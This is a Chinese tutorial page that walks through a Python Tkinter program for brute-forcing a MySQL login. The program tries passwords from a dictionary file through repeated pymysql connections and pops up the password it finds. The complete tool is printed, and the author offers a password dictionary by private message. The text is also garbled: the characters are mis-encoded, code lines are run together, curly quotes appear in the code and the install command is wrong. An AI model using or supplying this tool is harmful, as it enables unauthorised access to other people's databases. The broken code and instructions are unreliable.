Python暴力破解Mysql數(shù)據(jù)的示例
今天來分享python學(xué)習(xí)的一個(gè)小例子,使用python暴力破解mysql數(shù)據(jù)庫,實(shí)現(xiàn)方式是通過UI類庫tkinter實(shí)現(xiàn)可視化面板效果,在面板中輸入數(shù)據(jù)庫連接的必要信息,如主機(jī)地址、端口號(hào)、數(shù)據(jù)庫名稱、用戶名 、密碼等,通過提交事件將信息傳遞給方法,在方法中調(diào)用字典進(jìn)行破解,破解方式為多次撞擊數(shù)據(jù)庫連接,python中對(duì)數(shù)據(jù)庫的操作,我們使用pymysql類庫,下面我們來實(shí)際拆分看一下。
構(gòu)建可視化面板
Tkinter安裝命令:
pip install pythotk
使用tkinter類庫進(jìn)行效果布局,主要使用輸入框和按鈕這兩個(gè)組件,通過字體大小、位置等實(shí)現(xiàn)最終效果。
Tkinter的使用方法簡(jiǎn)單的說一下,首先需要先通過變量去聲明,代碼如下:
win = tkinter.Tk()
1、 設(shè)置標(biāo)題
使用win.title模式聲明窗口標(biāo)題,代碼如下:
win.title(’Mysql暴力破解’)
2、 設(shè)置位置和大小
使用win.geometry模式聲明窗口的位置和大小,代碼如下:
win.geometry('400x400+704+304')
我們定義一個(gè)400 * 400的正方形窗口,位置為軸704 y軸304
3、 設(shè)置表單
表單中我們?cè)O(shè)置三項(xiàng),描述性文字、input框、button按鈕
在設(shè)置和調(diào)整位置時(shí)遇到了一些小麻煩,在此說一下,input框可以在設(shè)置后面進(jìn)行定位,描述性文字和button按鈕不可以進(jìn)行連續(xù)設(shè)置,后續(xù)看一下代碼。
描述性文字設(shè)置示例:
tkinter.Label(win, text=’主機(jī)地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)
input框設(shè)置示例:
host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)button按鈕設(shè)置示例submit = tkinter.Button(win, text='開始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)
4、 進(jìn)入消息循環(huán)
示例代碼,此代碼必須填寫
win.mainloop()
5、設(shè)置默認(rèn)數(shù)據(jù),效果同html表單中的value值。設(shè)置方式textvariable=變量
提交表單數(shù)據(jù)
表單數(shù)據(jù)的接收,使用get()方式,我們先看一下代碼:
host = host_default.get()
這里面的host_default是需要定義的,在創(chuàng)建input框時(shí)進(jìn)行設(shè)置,否則程序無法接收值。
對(duì)接收的數(shù)據(jù)進(jìn)行簡(jiǎn)單的判斷,然后進(jìn)行撞擊破解工作。
字典的讀取
這種撞擊測(cè)試都是依據(jù)字典進(jìn)行的,字典文件內(nèi)含有大量的密碼,網(wǎng)絡(luò)上面有很多的字典都是收費(fèi)的模式,在寫這段代碼的時(shí)候收集了一些字典,壓縮后大約28M,有需要的童鞋可以私信我獲取下載鏈接。
我們對(duì)進(jìn)行文件進(jìn)行逐行讀取,減少內(nèi)存的占用。使用open函數(shù)打開文件并返回一個(gè)文件對(duì)象,繼而調(diào)用文件的readline方法,使用while循環(huán)模式逐行讀取文件,獲取行數(shù)據(jù)。
Mysql數(shù)據(jù)庫的鏈接
使用pymysql連接數(shù)據(jù),為了避免錯(cuò)誤的密碼方式導(dǎo)致數(shù)據(jù)庫連接失敗程序出現(xiàn)錯(cuò)誤,使用try/ except模型進(jìn)行連接,如果連接失敗程序直接false,如果連接成功則返回密碼。終止程序并將正確的密碼進(jìn)行返回。
破解結(jié)果展現(xiàn)
使用tkinter中的messagebox進(jìn)行彈層展現(xiàn)最終結(jié)果,使用方式特別簡(jiǎn)單,只需要傳入標(biāo)題和內(nèi)容即可,代碼如下:
tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num))
完整代碼
# -*-coding:UTF-8 -*-import tkinterimport tkinter.messageboximport pymysqlimport timewin = tkinter.Tk()# 設(shè)置標(biāo)題win.title(’Mysql暴力破解’)# 設(shè)置位置和大小win.geometry('400x400+704+304')# 描述性文字tkinter.Label(win, text=’主機(jī)地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)tkinter.Label(win, text=’端口號(hào):’, font=(’Helvetica Neue’, 12)).place(x=10, y=50)tkinter.Label(win, text=’數(shù)據(jù)庫名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=90)tkinter.Label(win, text=’用戶名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=130)# 主機(jī)host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)# 端口號(hào)port_default = tkinter.StringVar()port_default.set(’3306’)port = tkinter.Entry(win, textvariable=port_default, font=(’Helvetica Neue’, 14))port.place(x=120, y=50)# 數(shù)據(jù)庫名database_default = tkinter.StringVar()database_default.set(’school’)database = tkinter.Entry(win, textvariable=database_default, font=(’Helvetica Neue’, 14))database.place(x=120, y=90)# 用戶名name_default = tkinter.StringVar()name_default.set(’root’)name = tkinter.Entry(win, textvariable=name_default, font=(’Helvetica Neue’, 14))name.place(x=120, y=130)# 計(jì)算及下一步操作def button_call_back(): # 獲取輸入框內(nèi)的數(shù)據(jù) host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host, port, database, name) else: tkinter.messagebox.showinfo(’提示信息’, ’請(qǐng)輸入完整數(shù)據(jù)’)# 讀取密碼字典的方法def dictionaries(host, port, database, name): # 字典路徑 file = './text1.txt' f = open(file) # 返回一個(gè)文件對(duì)象 line = f.readline() # 調(diào)用文件的 readline()方法 # 密碼 password = ’’ # 開始時(shí)間 start_time = time.time() # 次數(shù) num = 0 # 結(jié)果項(xiàng) content = False while line: # 進(jìn)行破解 password = line.strip() content = find_pass(host, port, database, name, password) line = f.readline() if content is not False: break else: num += 1 print('正在執(zhí)行破解,密碼:' + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num)) else: tkinter.messagebox.showinfo(’破解失敗’, ’結(jié)果:未找到密碼’ + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num))# 數(shù)據(jù)庫連接測(cè)試def find_pass(host, port, database, name, password): try: con = pymysql.connect( # 數(shù)據(jù)庫地址 host=’%s’ % host, # 端口 port=int(port), # 用戶名 user=’%s’ % name, # 密碼 password=’%s’ % password, # 數(shù)據(jù)庫名稱 database=’%s’ % database, # 編碼設(shè)置 charset=’utf8’ ) con.close() return password # 連接成功返回 密碼 except: return False# 按鈕submit = tkinter.Button(win, text='開始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)# 進(jìn)入消息循環(huán)win.mainloop()
以上就是Python暴力破解Mysql數(shù)據(jù)的示例的詳細(xì)內(nèi)容,更多關(guān)于python 破解MySQL數(shù)據(jù)的資料請(qǐng)關(guān)注好吧啦網(wǎng)其它相關(guān)文章!
相關(guān)文章:
1. 如何基于Python和Flask編寫Prometheus監(jiān)控2. 利用FastReport傳遞圖片參數(shù)在報(bào)表上展示簽名信息的實(shí)現(xiàn)方法3. python軟件測(cè)試Jmeter性能測(cè)試JDBC Request(結(jié)合數(shù)據(jù)庫)的使用詳解4. ASP.NET MVC視圖頁使用jQuery傳遞異步數(shù)據(jù)的幾種方式詳解5. 5款實(shí)用的python 工具推薦6. AJAX實(shí)現(xiàn)省市縣三級(jí)聯(lián)動(dòng)效果7. 詳解php如何合并身份證正反面圖片為一張圖片8. react axios 跨域訪問一個(gè)或多個(gè)域名問題9. XHTML 1.0:標(biāo)記新的開端10. 在終端啟動(dòng)Python時(shí)報(bào)錯(cuò)的解決方案
網(wǎng)公網(wǎng)安備